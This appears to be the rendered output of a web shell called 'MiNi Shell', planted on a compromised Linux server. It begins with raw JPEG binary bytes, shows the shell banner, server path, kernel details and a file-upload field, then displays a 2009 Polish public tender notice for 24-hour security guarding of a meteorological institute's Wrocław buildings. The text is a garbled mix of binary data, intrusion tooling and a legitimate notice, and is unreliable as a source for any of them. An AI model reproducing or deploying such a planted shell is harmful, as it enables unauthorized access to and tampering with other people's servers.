JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090105/1349-N-2009.html

<p class="kh_header"><b>Wrocław: Stała fizyczna ochrona mienia na terenie posesji i w budynkach Instytutu Meteorologii i Gospodarki Wodnej Oddział we Wrocławiu przy ul. Parkowej 28 i 30</b><br>
<b>Numer ogłoszenia: 1349 - 2009; data zamieszczenia: 05.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut  Meteorologii i Gospodarki Wodnej - Oddział we Wrocławiu , ul. Parkowa 30, 51-616 Wrocław, woj. dolnośląskie, tel. 071 3200100, faks 071 3487991.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka badawczo-rozwojowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Stała fizyczna ochrona mienia na terenie posesji i w budynkach Instytutu Meteorologii i Gospodarki Wodnej Oddział we Wrocławiu przy ul. Parkowej 28 i 30.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi w zakresie stałej fizycznej ochrony mienia na terenie posesji i w budynkach Instytutu Meteorologii i Gospodarki Wodnej Oddział we Wrocławiu przy ul. Parkowej 28 i 30, świadczone całodobowo w dni robocze i wolne od pracy, tj. 24 godziny na dobę, w okresie objętym umową.
 
1. Charakterystyka chronionych obiektów:
budynki przy ul. Parkowej 28 i 30 tworzą zwartą zabudowę i są połączone funkcjonalnie:
a) kubatura:ul. Parkowa 28 - 2.991 m3, ul. Parkowa 30 - 5.666 m3;
b) ilość kondygnacji:ul. Parkowa 28 - 2, ul. Parkowa 30 - 3;
c) powierzchnia działki: ul. Parkowa 28 - 1.023 m2, ul. Parkowa 30 - 988 m2;
d) brak wydzielonej portierni;
e) okna piwnic i przyziemia okratowane;
f) częściowe wyposażenie w system antywłamaniowej sygnalizacji alarmowej;
g) zewnętrzny system telewizji przemysłowej - monitoring kamer;
h) ilość osób mogących jednorazowo przebywać na terenie obiektu - ok. 100.

2. Wymagany zakres świadczonych usług ochrony mienia:
a) zapobieganie włamaniom do chronionych obiektów;
b) zapobieganie aktom wandalizmu na terenie obiektów i posesji;
c) natychmiastowa reakcja w przypadku: awarii instalacji elektrycznej, aktów wandalizmu, wystąpienia zdarzenia wymagającego wezwania służb publicznych - policji, straży pożarnej, pogotowia: energetycznego, wodno-kanalizacyjnego, ciepłowniczego;
d) prowadzenie na bieżąco dokumentacji z przebiegu służby ochrony;
e) natychmiastowe informowanie osób wskazanych przez IMGW OWr o wszelkich okolicznościach, które miałyby bezpośredni lub pośredni wpływ na bezpieczeństwo chronionego obiektu i przebywających w nim osób;
f) sprawdzanie poprawności zamknięcia pomieszczeń biurowych;
g) sprawdzanie zamknięcia okien oraz wyłączanie zbędnego oświetlenia;
h) sprawdzanie zabezpieczenia zewnętrznego obiektu, tj. drzwi, bram garażowych, furtek i bram wjazdowych w ogrodzeniu posesji;
i) prowadzenie ksiąg ewidencji ruchu osobowego pracowników i ruchu pojazdów samochodowych;
j) monitorowanie systemów zabezpieczeń technicznych.

3. Ogólne wymagania wykonania usługi:
a) dane osobowe pracowników Wykonawcy wykonujących czynności stanowiące przedmiot zlecenia Wykonawca przedstawia Zamawiającemu w sporządzonym przez siebie wykazie stanowiącym załącznik do umowy;
b) w przypadku każdej zmiany składu osobowego pracowników wymienionych w ww. wykazie Wykonawca przedstawi Zamawiającemu, najpóźniej na dwa dni przed terminem przystąpienia nowych osób do wykonywania czynności określonych umową (z wyłączeniem przypadków losowych) nowy wykaz osób. Zmiana składu osobowego pracowników nie stanowi zmiany umowy;
c) pracownik ochrony jest wyposażony w: jednolity mundur i stosowny identyfikator Wykonawcy, środek łączności radiowej.
d) Wykonawca nie może powierzyć świadczenia usług będących przedmiotem zlecenia osobom trzecim bez pisemnej zgody Zamawiającego.

4. Szczegółowy zakres obowiązków Wykonawcy:
a) Wykonawca zobowiązuje się do ochrony obiektów z należytą starannością w ten sposób, że umieści w obiekcie w okresie trwania umowy - w dni robocze, wolne od pracy i święta - jednego pracownika ochrony, który podejmie czynności zgodnie z opracowaną wspólnie przez Zamawiającego i Wykonawcę Instrukcją służbową ochrony dla obiektów IMGW OWr,
b) w przypadku kiedy wymagają tego względy ochrony Wykonawca będzie postępować zgodnie z postanowieniami wewnętrznych instrukcji IMGW OWr;
c) Wykonawca zapewni wsparcie pracownika ochrony załogą interwencyjną w wypadku odebrania sygnału z systemu ostrzegającego o włamaniu;
d) czynności dozoru i ochrony będą wykonywane całodobowo we wszystkie dni łącznie z wolnymi sobotami, niedzielami i dniami świątecznymi;
e) pracownik ochrony wykonuje swoje obowiązki na posterunku zlokalizowanym w obiekcie we Wrocławiu przy ul. Parkowej 30, ponadto pracownik ochrony w czasie i po godzinach urzędowania wykonuje czynności posterunku ruchomego, obejmującego swoim zasięgiem teren wewnątrz i na zewnątrz budynku;
f) patrolowanie odbywa się zgodnie z Instrukcją służbową ochrony dla obiektów IMGW OWr;
g) pracownik ochrony wydaje i przyjmuje klucze do pomieszczeń osobom upoważnionym i prowadzi obowiązującą w IMGW OWr ewidencję w tym zakresie;
h) pracownik ochrony prowadzi ewidencję osób przebywających w ochranianych obiektach w godzinach pozasłużbowych;
i) pracownik ochrony prowadzi ewidencję ruchu środków transportu w godzinach poza służbowych w dni robocze oraz przez całą dobę w dniach wolnych od pracy;
j) stały dozór sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzeniach i systemach alarmowych zainstalowanych u Zamawiającego, będzie polegać na monitorowaniu systemu ostrzegającego o włamaniu z dojazdem załogi interwencyjnej i będzie obejmować wszystkie dni tygodnia, niedziele i święta;
k) niezwłoczne przyjazdy załogi interwencyjnej następują każdorazowo po otrzymaniu sygnału o włamaniu;
l) w przypadku potwierdzenia włamania załoga interwencyjna wspólnie z pracownikiem ochrony dokona interwencji i będzie nadzorować chroniony obiekt do czasu przybycia wskazanych przez Zamawiającego osób; 
m) zabezpieczenie techniczne będzie polegać na eksploatacji (obsłudze) przez pracowników ochrony Wykonawcy zainstalowanych elektronicznych urządzeń i systemów alarmowych, a także systemu telewizji przemysłowej;
n) Zamawiający udostępni pracownikowi ochrony Wykonawcy nieodpłatnie: łączność telefoniczną umożliwiającą komunikowanie się w sprawach związanych z ochroną i dozorowaniem sygnałów;
o) Zamawiający udostępni komplet kluczy do pomieszczeń budynków i zapewni miejsce na ich przechowanie.

5. Wymagana forma podania ceny:
Wykonawca podaje w ofercie zryczałtowaną cenę brutto za jedną roboczogodzinę usługi. Cena ta zawiera wszystkie elementy usługi objętej postępowaniem, oraz wszelkie koszty Wykonawcy związane z tą usługą i będzie podstawą wyboru najkorzystniejszej oferty, zgodnie z przyjętym kryterium oceny.
Łączną cenę oferty należy podać jako wynik iloczynu zryczałtowanej ceny brutto za 1 roboczogodzinę usługi i liczby roboczogodzin w okresie wykonania zamówienia, tj. 365 dni razy 24 roboczogodziny na dobę = 8.760 roboczogodzin.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.71.40.00-2, 98.34.11.40-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą się ubiegać Wykonawcy spełniający warunki określone w art. 22 ust. 1 ustawy, tj.:
a) posiadają uprawnienia do wykonywania określonej w SIWZ działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, 
c) znajdują się w sytuacji ekonomicznej i finansowej, zapewniającej wykonanie zamówienia,
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy,
oraz
e) posiadają polisę ubezpieczeniową od odpowiedzialności cywilnej, w zakresie prowadzonej działalności, na kwotę minimum 500.000,00 zł,
f) wykażą, że w okresie ostatnich trzech lat przed wszczęciem niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej jedną podobną usługę, o zakresie przedmiotowym i wartości porównywalnej z niniejszym zamówieniem;
g) złożą formularz ofertowy (wzór stanowi Załącznik nr 1 do SIWZ) wraz z wymaganymi dokumentami, oświadczeniami, załącznikami oraz zaświadczeniami wymaganymi treścią SIWZ;
h) spełniają wymagania określone ustawą oraz niniejszą SIWZ;
i) w przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia warunki określone w pkt a, b, c, d, e i h musi spełniać każdy z nich, natomiast warunek w pkt f i g muszą spełniać łącznie.

2. Ocena spełniania warunków wymaganych od Wykonawców będzie dokonywana na podstawie załączonych do oferty dokumentów  wymaganych na podstawie przepisów ustawy, według formuły spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia spełniania warunków udziału w postępowaniu Wykonawca zobowiązany jest wraz z ofertą (wzór stanowi Załącznik nr 1 do SIWZ) złożyć następujące dokumenty:
a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawionego nie wcześniej niż 6 miesięcy przed upływem  terminu składania ofert,
b) aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
c) informację banku, w którym Wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
d) polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, na kwotę minimum 500.000,00 zł,
e) aktualną informację z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sadowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
f) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
g) oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu wskazanych w art. 22 ust. 1 (wzór stanowi Załącznik nr 3 do SIWZ) i nie podleganiu wykluczeniu z postępowania na podstawie art. 24 ust.1 i 2 ustawy  (wzór stanowi Załącznik nr 4 do SIWZ),
h) wykaz usług wykonanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, daty wykonania i odbiorcy oraz załączenia dokumentów potwierdzających, że usługa ta została wykonana należycie (wzór stanowi Załącznik nr 5 do SIWZ).
Wszystkie dokumenty powinny być złożone w formie i treści zgodnej z wymaganiami przepisów Rozporządzenia z dnia 19 maja 2006 r. w sprawie rodzaju dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2006 r. nr 87, poz. 605 z późn. zm.),

oraz

2. Parafowany wzór umowy jako akceptacja jej treści i warunków (wzór stanowi Załącznik nr 6 do SIWZ),
3. Wypełniony formularz cenowy (wzór stanowi Załącznik nr 2 do SIWZ)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.imgw.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Meteorologii i Gospodarki Wodnej, Oddział we Wrocławiu, ul. Parkowa 30, 51-616 Wrocław; pokój nr 18, I p.; pon.-pt. w godz. 8:00-14:00.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.01.2009 godzina 10:30, miejsce: Instytut Meteorologii i Gospodarki Wodnej, Oddział we Wrocławiu, ul. Parkowa 30, 51-616 Wrocław; pokój nr 18, I p.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com